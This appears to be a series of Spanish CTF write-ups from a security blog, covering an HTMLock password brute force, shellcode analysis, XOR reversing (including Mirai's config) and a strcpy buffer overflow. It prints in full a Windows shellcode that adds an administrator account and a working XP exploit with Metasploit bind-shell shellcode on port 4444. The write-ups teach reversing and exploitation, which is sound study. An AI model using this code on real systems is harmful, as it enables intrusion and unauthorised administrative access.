proteger páginas HTML] Vemos que aparecen 2 opciones: [Imagen: Asistente de Atrise HTMLock en el paso uno para seleccionar la página a bloquear] Página para bloquear y otra para hacer backup de la misma para futuras modificaciones. Me creo una página html: [Imagen: Editor de código mostrando el archivo Rafa.html con un marquee anunciando el crackeo de HTMLock] Y la añado al programa. [Imagen: Asistente Atrise HTMLock, paso uno, seleccionando el archivo Rafa.html a proteger] Lo siguiente que me pide es una password: [Imagen: Asistente Atrise HTMLock, paso dos, introduciendo la contraseña por defecto default] Si os fijasteis en el código de la página original, venía algo familiar: [Imagen: Código fuente ofuscado en JavaScript con una larga cadena hexadecimal cifrada] var pw='default'; Parece que va a utilizar esta contraseña para el descifrado. Pues lo dejo tal cual. [Imagen: Asistente Atrise HTMLock, paso tres, seleccionando la plantilla Source Hide Protection] Después aparecen 3 opciones. Elegimos “Source Hide Protection”. [Imagen: Asistente Atrise HTMLock, último paso, con los botones Create y Show para generar la página] Y la creamos. [Imagen: Explorador de Windows mostrando los archivos Rafa.html y Rafa_original.html junto al asistente HTMLock] Vemos como nos ha generdo una nueva página. El resultado es este: [Imagen: Editor de código con las pestañas Rafa.html y Rafa_original.html mostrando el HTML bloqueado] Una página parecida a la del reto. Me imaginé que la rutina de descifrado del HTMLock estaría por una parte y la página por otro. Cojo esta parte del código del nivel 3. [Imagen: Primer plano del array hexadecimal ofuscado incrustado en el código de Rafa.html] Copio y pego en el mío, quedando: [Imagen: Editor de código con tres pestañas abiertas, Rafa.html, Rafa_original.html y BN_nivel3.html] Lo abro y veo que ha funcionado perfectamente. [Imagen: Página web Boinas Negras pidiendo la contraseña para avanzar al siguiente nivel del reto] Por lo tanto, la página está en esa parte. Vale, entendiendo como funciona el software y ver que no hay opción de descifrado conociendo la contraseña original (“default”), pasamos a la acción, al fin y al cabo es Javascript, nosotros tendremos el control sobre él, ocurre en nuestro navegador y tenemos acceso al código. Hay muchas formas de resolver esto, os pongo una. La zona que va escribiendo según el algoritmo implementado por la herramienta está aquí: [Imagen: Fragmento de JavaScript resaltado que añade el código descifrado a la variable codigofuente] Así que añado una variable que me vaya guardando el contenido de lo que vaya “descifrando”. La declaro antes para que no dé problemas. [Imagen: Declaración de la variable codigofuente junto al array hexadecimal cifrado en el script] Y añado al final esto otro: [Imagen: Código resaltado que usa document.write con un textarea para mostrar el código fuente descifrado] Para verlo mejor, como diría el lobo de “Caperurita Roja” :P Si lo abrimos con el navegador veremos un textarea con el contenido del código fuente original descifrado. [Imagen: Página Boinas Negras y, debajo, el código HTML revelado del nivel 3 de autenticación web] Y vemos el siguiente código. [Imagen: Código JavaScript con las funciones autenticar y validapass que calculan el hash de la contraseña] Esta es la función que realiza la comprobación de la contraseña. [Imagen: Fragmento de código con la condición validapass y el mensaje de alerta de contraseña inválida] Si le gusta la contraseña, nos llevará a una página con el mismo nombre de la misma y terminada en “.asp”, en lo que estaba programado el reto. Que hice entonces, traducir ese código javascript a otro que compilado fuese rápido. Lo primero que saqué son los valores del array “f”. [Imagen: Comparación de los valores precalculados del array f junto al bucle JavaScript que los genera] Valores del array f[36]: f[0]=1 f[1]=16974593 f[2]=135005697 f[3]=454756609 f[4]=1076890625 f[5]=2102071041 f[6]=3630961153 f[7]=1469256960 f[8]=12589055 f[9]=3656588031 f[10]=3911982590 f[11]=879436028 f[12]=3249546235 f[13]=2533041913 f[14]=3125553655 f[15]=832777460 f[16]=50343921 f[17]=878916334 f[18]=3419157995 f[19]=3476764903 f[20]=1152400354 f[21]=841694941 f[22]=2645311960 f[23]=2368947410 f[24]=113264587 f[25]=273894084 f[26]=2951499197 f[27]=3951775925 f[28]=3375387564 f[29]=1322997410 f[30]=2190236056 f[31]=1782799501 f[32]=201351041 f[33]=1841521269 f[34]=2509006184 f[35]=2304469082 Finalmente creamos un programa en el lenguaje que más os guste, este está en C, yo lo hice además en Pascal, Perl y no me acuerdo qué más :-D He puesto una serie de for encadenados para obtener una contraseña de hasta 5 caracteres. En su día era mayor, la puse hasta 8, lo he quitado. En el programa traté de llamarlo todo según estaba el original en Javascript, fue como una traducción, más bien. [Imagen: Código en C que traduce la función validapass de JavaScript para el ataque de fuerza bruta] [Imagen: Función main en C con el array f precalculado y el bucle de longitud de contraseña] [Imagen: Bucles anidados en C que prueban contraseñas de 3, 4 y 5 caracteres llamando a validapass] Para ir al grano y como sé que tiene 5, se puede comentar “validapass(pw);” y dejarlo únicamente en el correspondiente a 5 caracteres, es decir, el último. [Imagen: Función en C con bucles anidados de 1 a 5 caracteres que fuerzan la contraseña completa] El resultado: [Imagen: Terminal mostrando el comando time ./nivel3_crack_5char con las contraseñas detectadas 5hb1q y h5b1q] Mira por donde, las posibles soluciones son 2. ¿Qué me pasó en su día? Que puse un “exit()” cuando diera positivo, salió 5hb1q y cuando fui acceder me decía 404 “Not Found”, y dije, ¿pero cómo que no? Así que pensé, ¿y si hay más de una? Así que quité el “exit()” y lo dejé terminar saliendo el otro resultado y ese sí que existía la página de acceso al siguiente nivel. Espero que os haya gustado. By Rafa --- # Capture The Flag - Reto Ciberseguridad Nivel 4 : Shellcode URL: https://ciberseguridad.blog/capture-the-flag-reto-ciberseguridad-nivel-4-shellcode/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-28 Actualizado: 2026-10-04 Tema: Capture The Flag o Reto de Ciberseguridad > Cuarto Capture The Flag o "Reto de Ciberseguridad" de esta serie de CTF. Nivel 4 al que hemos llamado "Shellcode". ¡ ATREVETE ! Otro Capture The Flag como todos en el mundillo conocemos o "Reto de Ciberseguridad" de esta serie de CTF con el Nivel 4 al que hemos llamado "Shellcode", nos hemos roto la cabeza pensando ;) . El reto consiste en ver que hace exactamente este Shelcode: "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a" "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf" "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f" "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69" "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63" "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44" "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33" "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65" "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63" "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7" ## Resolución CTF - Nivel 4 : Shellcode El reto es decir exactamente qué hace la shellcode que aparece aquí: ## `Add Admin User Shellcode (194 bytes) - Any Windows Version Title: Add Admin User Shellcode (194 bytes) - Any Windows Version Release date: 21/06/2014 Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) Size: 194 byte (NULL free) Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3 Username: BroK3n Password: BroK3n char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a" "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf" "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f" "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69" "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63" "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44" "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33" "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65" "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63" "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"; int main(int argc, char **argv){int (f)();f = (int ()())shellcode;(int)(*f)();} ` Por el título, vemos que se trata de “Add Admin User Shellcode” con usuario BroK3n y contraseña BroK3n. Pero hay que estar seguros. Abriremos radare2 y escribiremos la shellcode quitándole “\x” y dejándolo todo en una línea. Utilizaremos la shell para conseguirlo. [Imagen: image001-1] Como veis, no abrimos radare2 con un fichero, si no sabéis las opciones, la ayuda suele venir bien. `$ radare2 -h Usage: r2 [-ACdfLMnNqStuvwz] [-P patch] [-p prj] [-a arch] [-b bits] [-i file] [-s addr] [-B baddr] [-M maddr] [-c cmd] [-e k=v] file|pid|-|--|= -- open radare2 on an empty file - equivalent of 'r2 malloc://512' = read file from stdin (use -i and -c to run cmds) -= perform !=! command to run all commands remotely -0 print \x00 after init and every command -a [arch] set asm.arch -A run 'aaa' command to analyze all referenced code -b [bits] set asm.bits -B [baddr] set base address for PIE binaries -c 'cmd..' execute radare command -C file is host:port (alias for -c+=http ://%s/cmd/) -d debug the executable 'file' or running process 'pid' -D [backend] enable debug mode (e cfg.debug=true) -e k=v evaluate config var -f block size = file size -F [binplug] force to use that rbin plugin -h, -hh show help message, -hh for long -H ([var]) display variable -i [file] run script file -I [file] run script file before the file is opened -k [k=v] perform sdb query into core->sdb -l [lib] load plugin file -L list supported IO plugins -m [addr] map file at given address (loadaddr) -M do not demangle symbol names -n, -nn do not load RBin info (-nn only load bin structures) -N do not load user settings and scripts -o [OS/kern] set asm.os (linux, macos, w32, netbsd, ...) -q quiet mode (no prompt) and quit after -i -p [prj] use project, list if no arg, load if no file -P [file] apply rapatch file and quit -R [rarun2] specify rarun2 profile to load (same as -e dbg.profile=X) -s [addr] initial seek -S start r2 in sandbox mode -t load rabin2 info in thread -u set bin.filter=false to get raw sym/sec/cls names -v, -V show radare2 version (-V show lib versions) -w open file in write mode -z, -zz do not load strings or load them even in raw Escribimos la shellcode con wx seguida de ella, en una línea. Y analizamos “aaa”. [Imagen: image002-1] Imprimimos por pantalla el resultado del desensamblado. A simple vista no vermos el contenido de las strings debido a que hay que forzarlo. ¿Donde están? En los push. Para ello, utilizaremos “ahi s @ offset”. [Imagen: image003-1] Si necesitais ver la ayuda, con poner un interrogando después del carácter asociado al comando... Ahora “ah?”. [Imagen: image004-1] Seguimos mostrando ayuda: [Imagen: image005-1] Lo que estoy haciendo es que analice el contenido que hay en el offset que sea de una forma “mejor” que el análisis que hizo al principio con “aaa”. [Imagen: image006-1] De esta forma veremos como ese contenido en los push cambia de: [Imagen: image007-1] A esto otro, que ya es legible. [Imagen: image008-1] Quedando de esta manera: [Imagen: image009-1] Ahora podemos copiar ese contenido en un fichero y jugar. [Imagen: image010-1] No hay nada como la shell para esto: $ cat push.txt | 0x0000004e 684b336e01 push '\x01n3K' | 0x00000053 682042726f push 'orB ' | 0x00000058 682f414444 push 'DDA/' | 0x0000005d 686f727320 push ' sro' | 0x00000062 6874726174 push 'tart' | 0x00000067 68696e6973 push 'sini' | 0x0000006c 682041646d push 'mdA ' | 0x00000071 68726f7570 push 'puor' | 0x00000076 6863616c67 push 'glac' | 0x0000007b 6874206c6f push 'ol t' | 0x00000080 6826206e65 push 'en &' | 0x00000085 6844442026 push '& DD' | 0x0000008a 686e202f41 push 'A/ n' | 0x0000008f 68726f4b33 push 0x334b6f72 | 0x00000094 68336e2042 push 'B n3' | 0x00000099 6842726f4b push 'KorB' | 0x0000009e 6873657220 push ' res' | 0x000000a3 6865742075 push 'u te' | 0x000000a8 682f63206e push 'n c/' | 0x000000ad 6865786520 push ' exe' | 0x000000b2 68636d642e push '.dmc' $ awk -F\' '{print $2}' push.txt | tr -d '\n' | perl -ne 'chomp;print scalar reverse . "\n";' cmd.exe /c net user BroK3n Bn /ADD && net localgroup Administrators /ADD BroK3n10x\ Por lo tanto, ya tenemos la respuesta al reto. La shellcode hace lo que vemos, crea un usuario BroK3n y lo añade al grupo de administradores. Hay más formas de resolverlo. Por ejemplo: https://www.percederberg.net/tools/text_converter.html [Imagen: image011-1] Sólo habría que tratar la salida de la cadena que se ve... La idea para este reto me la dio este artículo: Si leeis el artículo veréis como aparece un comando, portado a nuestro código, sería: $ cat shellcode.txt | awk -F\" '{print $2}' | sed 's/\\\x//g' | tr -d '\n' | rasm2 -d - xor edx, edx mov dl, 0x30 mov edx, dword fs:[edx] mov edx, dword [edx + 0xc] mov edx, dword [edx + 0x1c] mov eax, dword [edx + 8] mov esi, dword [edx + 0x20] mov edx, dword [edx] cmp byte [esi + 0xc], 0x33 jne 0xd mov edi, eax add edi, dword [eax + 0x3c] mov edx, dword [edi + 0x78] add edx, eax mov edi, dword [edx + 0x20] add edi, eax xor ebp, ebp mov esi, dword [edi + ebp*4] add esi, eax inc ebp cmp dword [esi], 0x456e6957 jne 0x2c mov edi, dword [edx + 0x24] add edi, eax mov bp, word [edi + ebp*2] mov edi, dword [edx + 0x1c] add edi, eax mov edi, dword [edi + ebp*4 - 4] add edi, eax push 0x16e334b push 0x6f724220 push 0x4444412f push 0x2073726f push 0x74617274 push 0x73696e69 push 0x6d644120 push 0x70756f72 push 0x676c6163 invalid je 0x9e insb byte es:[edi], dx outsd dx, dword [esi] push 0x656e2026 push 0x26204444 push 0x412f206e push 0x334b6f72 push 0x42206e33 push 0x4b6f7242 push 0x20726573 push 0x75207465 push 0x6e20632f push 0x20657865 push 0x2e646d63 mov ebp, esp dec byte [ebp + 0x53] xor eax, eax push eax push ebp call edi Un texto recomendable, “Shellcoding in Linux”: Espero que os haya gustado. --- # Capture The Flag - Reto Ciberseguridad Nivel 3 : Nop Nop Nop URL: https://ciberseguridad.blog/capture-the-flag-reto-ciberseguridad-nivel-3-nop-nop-nop/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-28 Actualizado: 2026-10-04 Tema: Capture The Flag o Reto de Ciberseguridad > Tercer Capture The Flag o "Reto de Ciberseguridad" de esta serie de CTF. Nivel 3 al que hemos llamado "Nop Nop Nop". ¡ ATREVETE ! Otro Capture The Flag como todos en el mundillo conocemos o "Reto de Ciberseguridad" de esta serie de CTF con el Nivel 3 al que hemos llamado "Nop Nop Nop". Podéis bajaros el ejecutable pinchando en la imagen: ## Resolución CTF - Nivel 3 : Nop Nop Nop Hola Hackers!!!! Nivel 3. Tenemos 2 binarios. $ md5sum Level3 Level3.exe 47d9ef2069d646522dbb9cd9b303414e Level3 02be333c8732920d1131a195e5753eb1 Level3.exe Antes de nada vamos a ejecutarlo para ver qué hace el programa: [Imagen: image001] Parece que espera algo por parámetro y siempre sale un “90909090” (NopNopNopNop). Lo cargamos con radare2 (de Linux) (después lo haré con IDA para ver las diferencias): [Imagen: image002] [Imagen: image003] Lo analizamos: [Imagen: image004] Desensamblo el main: [Imagen: image005] Y tenemos una llamada a lo que parece una función en la que se algo relacionado con xor: [Imagen: image006] Justo después hace una comparación con algo. Después estará el mensaje con la cadena 90909090. Si nos hemos fijado al principio de main: [Imagen: image007] Tenemos 2 string: “90909090” (local_18h) y “Prueba” (local_20h). [Imagen: image008] Primero de definen una serie de variables, como vemos (esas que se ven de Prueba o 90909090 y un par más, justo las 2 de arriba local_8h y local_10h). Comienza el programa y comprueba si se le pasa un parámetro. Si es que sí se va a la t y si es que no a la f: [Imagen: image009] Mostrando el correspondiente mensaje de “no input”. Si hemos introducido algo, vamos a la función “xorencrypt”. Obtiene un resultado y la compara con 0. Sino es igual a cero (jne) salta a 0x40080e y muestra un mensaje (local_18h) que era 90909090. [Imagen: image010] Si es igual mostrará otro (local_28h) que salía del “xorencrypt”. Veamos la función “xorencrypt”: [Imagen: image011] Aparecen nuestras variables local_28h y local_30h en donde obtiene el tamaño de lo que se le pasa en uno de los parámetros y lo guarda. Lo mismo ocurre con el otro parámetro y local_10h y local_30h. Después incrementa en 1 una de ellas (local_10h) y reserva memoria (malloc) con su contenido. [Imagen: image012] Inicializa otra (local_4h) a cero y comienza lo que sería un bucle. Algo así como: For (local_4h = 0; local_4h < local_10h; local_4h++). [Imagen: image013] Y ahí está el Michael Knight (KIT) de la cuestión… Tenemos local_4h, local_20h, local_20h y local_30h, todas vistas anteriormente. Sería algo como: String_cifrado[local_4h] = cadena_con_xor_original [local_4h] xor Clave_por_parametro [local_4h % longitud_ Clave_por_parametro] La clave de todo esto está en ese “xor eax,esi” que se ve y ¿por qué no es tan evidente? Porque depende de lo que le pases por parámetro, no está “a fuego”. Si le pasas una “A”, “A” será un 0x41 (65), “B” será 0x42 (66), etc… De ahí que no se vea directamente, por lo que hace falta hacer algo, conocido como… ¡¡¡FUERZA BRUTA!!! Tranquilos, lo puse fácil, está entre la A y la Z. O sentido común. En la Wikipedia podemos encontrar una explicación de lo que haría la función XOR [Imagen: image014] Supongamos que queremos realizar un xor de la palabra “Hola” con la “A” (0x41) y nos saldría, antes: [Imagen: image015] Resultado: [Imagen: image016] Si realizáramos la operación inversa, tendríamos, después: [Imagen: image017] Resultado: [Imagen: image018] Mismo resultado por lo que podéis ver. Por último solamente queda comparar lo que salga de la función con los 6 primeros caracteres y comprobar que empieza por “Prueba”. Si es así, mostrará el mensaje completo, utilizará el valor único (1 solo carácter – 0x[a-z0-9]{2} para cada valor del array). Vamos al IDA, las variables: [Imagen: image019] Aterrizamos en la función main: [Imagen: image020] Igual que con radare2, se ve lo mismo. [Imagen: image021] Función xorencrypt que vimos antes, no me quiero repetir…. [Imagen: image022] Vamos a verlo gráficamente: [Imagen: image023] [Imagen: image024] [Imagen: image025] Con los cortes en las imágenes no se ven tan bien, sin ellos, sí se ve. [Imagen: image026] La función xorencrypt: [Imagen: image027] Y el xor del que hemos hablado: [Imagen: image028] Es exactamente igual. ¿Y cómo resolvemos esto? No sé lo que tengo que pasarle. Solución 1 (Shell version): ¿Qué charset utilizaré? A..Z, a..z, 0..9. [Imagen: image029] Por lo que ya sabemos el valor del contenido de: [Imagen: image030] Solución 2 (Didier Stevens version): Didier Stevens se ha currado una herramienta muy útil con la idea de buscar en un fichero cadenas cifradas con XOR, justo lo que hace nuestro programa. Y además sabemos que lo compara con algo, “Prueba”, por lo que podemos utilizarla de la siguiente manera: [Imagen: image031] [Imagen: image032] Solución 3 (Radare2 version): Abrimos el CTF con Radare2, analizamos, buscamos la cadena que realizará el XOR, nos posicionamos en el offset adecuado, le damos un tamaño, realizamos el xor y vemos el resultado. [Imagen: image033] [Imagen: image034] Solución 4 (r2pipe version): ¿Qué es r2pipe? [Imagen: image035] La API para interactual con radare2. `import r2pipe offset = "0x004008b4" xorkey = "52" r2 = r2pipe.open("./Level3") r2.cmd("e io.cache=true") print ("Antes...") r2.cmd("s " + offset) print r2.cmd("ps 16 @ " + offset) r2.cmd("b 16") # le da un tamanio al buffer print ("Aplicando xor con 0x" + xorkey + "...") r2.cmd("wox " + xorkey + " @ " + offset) # realiza un xor con 0x41 en donde esta la cadena cifrada print ("Despues...") print r2.cmd("ps 16 @ " + offset) # muestra la cadena descifrada ` [Imagen: image036] Solución 5 (IDA version): Abrimos IDA y vemos a la zona donde está la cadena cifrada: [Imagen: image037] Pulsamos , nos abre una ventana donde podemos ejecutar scripts de IDA (IDC) y añadimos el siguiente código: [Imagen: image038] [Imagen: image039] Ponemos una dirección de inicio, una de final y pulsamos “Run”. BONUS - CASO REAL: Mirai mirai.x86: 7e17c34cddcaeb6755c457b99a8dfe32 Localizamos la zona en donde se realiza el descifrado de la configuración: [Imagen: image040] En este caso, se descifra realizando un xor con 0x22. [Imagen: image041] Esta son las cadenas cifradas y que hay que descifrar. Aplicamos el xor con 0x22 a dicha zona y ya vemos el contenido de la configuración. [Imagen: image042] Vemos la cadena MIRAI Espero que os haya gustado. --- # Capture The Flag - Reto Ciberseguridad Nivel 2 : Lamebuf URL: https://ciberseguridad.blog/capture-the-flag-reto-ciberseguridad-nivel-2-lamebuf/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-28 Actualizado: 2026-10-04 Tema: Capture The Flag o Reto de Ciberseguridad > Segundo Capture The Flag o "Reto de Ciberseguridad" de esta serie de CTF. Nivel 2 al que hemos llamado "Lamebuf". ¡ ATREVETE ! Otro Capture The Flag como todos en el mundillo conocemos o "Reto de Ciberseguridad" de esta serie de CTF con el Nivel 2 al que hemos llamado "Lamebuf". Podéis bajaros el ejecutable pinchando en la imagen: ## Resolución CTF - Nivel 2 : Lamebuf > Los desafíos son los que hacen la vida interesante, y superarlos es lo que hace la vida significativa Hola a todos!! Lo primero de todo, trataremos de ver qué es lo que hace este programa. Si os acordáis del reto anterior, teníamos al maravilloso IDA y su pseudo código C. [Imagen: Lamebuf001] Pulsamos F5: [Imagen: Lamebuf002] Aunque no lo recuerdo, pero diría que se parece bastante. Sólo veo 1 problema, es que el tamaño importa y aquí no se ve. Lo que parece que hace es, copia lo que se le pasa por parámetro a una variable y sale del programa. Solamente eso… Pues vaya, se acabó el reto: [Imagen: Lamebuf003] Que no… que hay más, ¡¡¡¡mucho más!!!! Si vamos a la variable, pulsamos botón derecho y seleccionamos array, tenemos un tamaño. [Imagen: Lamebuf004] Y me gusta, mucho… seleccionamos el checkbox “create as array” y: [Imagen: Lamebuf005] Y ya tendríamos en IDA este pseudo código: int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax@2 char v4 [512]; // [sp+0h] [bp-200h]@3 if ( argc == 2 ) { strcpy(&v4, argv[1]); result = 0; } else { result = -1; } return result; } Como alguno ya se habrá dado cuenta, esto va de Buffer Overflow Seguimos con la Wiki, que nos dice de STRCPY Dice: //El puntero destino debe contener suficiente espacio para copiar sobre la zona de memoria a la que apunta, la ristra apuntada por origen Si el contenido que le pase como parámetro es menor que ese tamaño, no pasaría nada a simple vista, ¿pero y si es mayor? Pondré un ejemplo rápido, añado un montón de AAAAAAAA + BBBB + ….+ FFFF. [Imagen: Lamebuf006] Y mirad lo que pasa, EIP = 43434343, o lo que es lo mismo, CCCC. EBP = 42424242, o lo que es lo mismo, BBBB. El contenido de ESP = DDDDEEEEFFFF. Menuda casualidad, he dado con los valores adecuados para poder realizar lo que se conoce como un ataque de Buffer Overflow, jejeje. Si miramos la pila vemos todos los 41 (A), BBBB, CCCC,DDDD,EEEE y FFFF. Vale si controlo el valor de EIP (que apunta a la siguiente instrucción a ejecutar) y el contenido de la pila podría ejecutar cualquier cosa que quiera. [Imagen: Lamebuf007] Supongamos que queremos explotarlo, necesitaremos una herramienta como Dependency Walwer. Abrimos la dll “MSVCRT.DLL”, porque vamos a ejecutar system(“cmd.exe”). [Imagen: Lamebuf008] Sumamos la dirección de la DLL + Función System y lo añadimos a este código. Esta captura es de un Windows 7 PRO. Veamos una de Windows XP SP3: [Imagen: Lamebuf009] ¿Por qué digo esto? Porque en Windows 7, se implementó una serie de medidas de seguridad, ASLR, DEP , etc ... Este exploit que voy a mostraros, funcionaría sin problemas en un XP anterior a SP2, pero en uno posterior o un Windows 7, no, esa dirección cambiaría. Por otro lado necesito otra herramienta que me busque saltos en dll. [Imagen: Lamebuf010] Si os acordáis como se veía en el Ollydbg, necesito: [Imagen: Lamebuf011] Buffer ––––––––– EBP –––––––––––– EIP –––––––––––– ESP AAAAAAAs ------- BBBB ----------- CCCC ----------- DDDDEEEEFFFF [Imagen: Lamebuf012] Probaremos con Windows XP :-D, eh! No he dicho que lo intenteis en Windows 7 o posterior, recordad que esto es a modo introductorio, no de experto :P Este es el exploit: #include #include #include #define RET_ADDRESS 0x7C924663 // 0x7C924663 On WinXP Sp1 English JMP ESP in NTDLL.DLL PC Retos // First stage shellcode - decrease ecx by 512 and JMP ecx unsigned char stage1[]= "\xFE\xCD\xFE\xCD\xFF\xE1"; // win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com/ unsigned char shellcode[] = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85" "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19" "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05" "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0" "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15" "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14" "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53" "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf" "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb" "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c" "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f" "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8" "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f" "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; int main(int argc,char *argv[]){ char *bufExe[3]; char buf[540]; bufExe[0] = "quehaceesto.exe"; bufExe[2] = NULL; buf[531]=0; memset(buf,0x90,520); memcpy(&buf[20],shellcode,sizeof(shellcode)-1); memcpy(&buf[520],stage1,sizeof(stage1)); *(unsigned long *)&buf[516] = RET_ADDRESS; bufExe[1] = buf; execve(bufExe[0],bufExe,NULL); return 0x0; } He modificado uno que tenía para ciertos PC llamados Retos que funcionaba hace tiempo ;-) [Imagen: Lamebuf013] Vemos como no aparece el puerto abierto 4444. El exploit aprovecha la vulnerabilidad y abre ese puerto con una shell o cmd.exe. // win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com/ Está sacado de Metasploit, como podéis ver, podríais ejecutar cualquier cosa, esta opción de la shell me gusta. Lo compilamos con Visual C++ 6 (sí, soy un clásico) y… [Imagen: Lamebuf014] Shell al canto en el puerto 4444. Ahora os podríais conectar por telnet, con el putty, etc. En cuanto al reto, la contestación sería, “el programa es vulnerable a buffer overflow ya que no se comprueba el tamaño de lo que se le introduce por parámetro y la función strcpy lo copia tal cual sin comprobar que es mayor de lo que admite.” Bonus: ”se podría utilizar en su lugar strncpy que sí lo comprueba, aunque siempre va a depender del programador, que la sepa utilizar adecuadamente.” Bonus++: “currarse un exploit que se salte el aslr, como este ” Referencias --- # Capture The Flag - Reto Ciberseguridad Nivel 1 : Easy Level URL: https://ciberseguridad.blog/capture-the-flag-reto-ciberseguridad-nivel-1-easy-level/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-28 Actualizado: 2026-10-04 Tema: Capture The Flag o Reto de Ciberseguridad > Primer Capture The Flag o "Reto de Ciberseguridad" de esta serie de CTF. Nivel 1 al que hemos llamado "Easy Level". ¡ ATREVETE ! Hoy os traigo el primer Capture The Flag como todos en el mundillo conocemos o "Reto de Ciberseguridad" de esta serie de CTF con el Nivel 1 al que hemos llamado "Easy Level". Podéis bajaros el ejecutable pinchando en la imagen: ## Resolución CTF - Nivel 1 : Easy Level Vamos a resolver el primer crackme, CTF, reto de reversing o como más os guste 